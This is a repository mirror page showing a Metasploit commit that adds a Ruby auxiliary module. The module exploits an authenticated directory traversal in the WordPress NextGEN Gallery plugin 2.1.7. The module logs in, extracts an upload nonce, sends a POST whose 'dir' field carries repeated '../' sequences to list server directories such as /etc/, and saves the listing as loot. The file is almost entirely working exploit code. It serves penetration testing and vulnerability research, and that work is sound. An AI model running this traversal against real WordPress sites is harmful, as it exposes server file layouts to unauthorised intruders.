infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Land #5913, Add WP NextGEN Gallery Directory Traversal Vuln

bug/bundler_fix
wchen-r7 2015-09-02 00:01:35 -05:00
parent 1aa7c596ce 626704079d
commit 0c4b020089
No known key found for this signature in database
GPG Key ID: 2384DB4EF06F730B
1 changed files with 152 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

152
modules/auxiliary/scanner/http/wp_nextgen_galley_file_read.rb Normal file
View File

@ -0,0 +1,152 @@
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
require 'json'
require 'nokogiri'
class Metasploit3 < Msf::Auxiliary
include Msf::Auxiliary::Report
include Msf::HTTP::Wordpress
include Msf::Auxiliary::Scanner
def initialize(info = {})
super(update_info(info,
'Name' => 'WordPress NextGEN Gallery Directory Read Vulnerability',
'Description' => %q{
This module exploits an authenticated directory traversal vulnerability
in WordPress Plugin "NextGEN Gallery" version 2.1.7, allowing
to read arbitrary directories with the web server privileges.
},
'References' =>
[
['WPVDB', '8165'],
['URL', 'http://permalink.gmane.org/gmane.comp.security.oss.general/17650']
],
'Author' =>
[
'Sathish Kumar', # Vulnerability Discovery
'Roberto Soares Espreto <robertoespreto[at]gmail.com>' # Metasploit Module
],
'License' => MSF_LICENSE
))
register_options(
[
OptString.new('WP_USER', [true, 'A valid username', nil]),
OptString.new('WP_PASS', [true, 'Valid password for the provided username', nil]),
OptString.new('DIRPATH', [true, 'The path to the directory to read', '/etc/']),
OptInt.new('DEPTH', [ true, 'Traversal Depth (to reach the root folder)', 7 ])
], self.class)
end
def user
datastore['WP_USER']
end
def password
datastore['WP_PASS']
end
def check
check_plugin_version_from_readme('nextgen-gallery', '2.1.9')
end
def get_nonce(cookie)
res = send_request_cgi(
'uri' => normalize_uri(wordpress_url_backend, 'admin.php'),
'method' => 'GET',
'vars_get' => {
'page' => 'ngg_addgallery'
},
'cookie' => cookie
)
if res && res.redirect? && res.redirection
location = res.redirection
print_status("#{peer} - Following redirect to #{location}")
res = send_request_cgi(
'uri' => location,
'method' => 'GET',
'cookie' => cookie
)
end
res.body.scan(/var browse_params = {"nextgen_upload_image_sec":"(.+)"};/).flatten.first
end
def parse_paths(res)
begin
j = JSON.parse(res.body)
rescue JSON::ParserError => e
elog("#{e.class} #{e.message}\n#{e.backtrace * "\n"}")
return []
end
html = j['html']
noko = Nokogiri::HTML(html)
links = noko.search('a')
links.collect { |e| normalize_uri("#{datastore['DIRPATH']}/#{e.text}") }
end
def run_host(ip)
vprint_status("#{peer} - Trying to login as: #{user}")
cookie = wordpress_login(user, password)
if cookie.nil?
print_error("#{peer} - Unable to login as: #{user}")
return
end
vprint_status("#{peer} - Trying to get nonce...")
nonce = get_nonce(cookie)
if nonce.nil?
print_error("#{peer} - Can not get nonce after login")
return
end
vprint_status("#{peer} - Got nonce: #{nonce}")
traversal = "../" * datastore['DEPTH']
filename = datastore['DIRPATH']
filename = filename[1, filename.length] if filename =~ /^\//
res = send_request_cgi(
'method' => 'POST',
'uri' => normalize_uri(target_uri.path),
'headers' => {
'Referer' => "http://#{rhost}/wordpress/wp-admin/admin.php?page=ngg_addgallery",
'X-Requested-With' => 'XMLHttpRequest'
},
'vars_get' => {
'photocrati_ajax' => '1'
},
'vars_post' => {
'nextgen_upload_image_sec' => "#{nonce}",
'action' => 'browse_folder',
'dir' => "#{traversal}#{filename}"
},
'cookie' => cookie
)
if res && res.code == 200
paths = parse_paths(res)
vprint_line(paths * "\n")
fname = datastore['DIRPATH']
path = store_loot(
'nextgen.traversal',
'text/plain',
ip,
paths * "\n",
fname
)
print_good("#{peer} - File saved in: #{path}")
else
print_error("#{peer} - Nothing was downloaded. You can try to change the DIRPATH.")
end
end
end